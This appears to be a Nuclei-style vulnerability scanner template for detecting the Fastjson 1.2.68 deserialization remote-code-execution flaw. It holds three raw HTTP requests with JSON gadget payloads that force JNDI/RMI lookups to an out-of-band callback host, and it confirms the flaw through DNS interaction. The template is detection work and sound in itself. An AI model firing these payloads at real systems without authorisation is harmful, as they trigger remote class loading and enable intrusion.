55 lines
1.3 KiB
YAML
55 lines
1.3 KiB
YAML
|
id: fastjson-1-2-68-rce
|
||
|
|
||
|
info:
|
||
|
name: Fastjson 1.2.68 Deserialization RCE
|
||
|
author: zh
|
||
|
severity: critical
|
||
|
reference:
|
||
|
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||
|
- https://github.com/wyzxxz/fastjson_rce_tool
|
||
|
tags: fastjson,rce,deserialization,oast
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST / HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/json
|
||
|
|
||
|
{
|
||
|
"@type":"org.apache.shiro.jndi.JndiObjectFactory",
|
||
|
"resourceName":"rmi://{{interactsh-url}}/Exploit"
|
||
|
}
|
||
|
|
||
|
- |
|
||
|
POST / HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/json
|
||
|
|
||
|
{
|
||
|
"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
|
||
|
"jndiNames":"rmi://{{interactsh-url}}/Exploit"
|
||
|
}
|
||
|
|
||
|
- |
|
||
|
POST / HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/json
|
||
|
|
||
|
{
|
||
|
"@type":"br.com.anteros.dbcp.AnterosDBCPConfig",
|
||
|
"metricRegistry":"rmi:/{{interactsh-url}}/Exploit"
|
||
|
}
|
||
|
|
||
|
stop-at-first-match: true
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: interactsh_protocol # Confirms DNS Interaction
|
||
|
words:
|
||
|
- "dns"
|
||
|
|
||
|
- type: status
|
||
|
negative: true
|
||
|
status:
|
||
|
- 200
|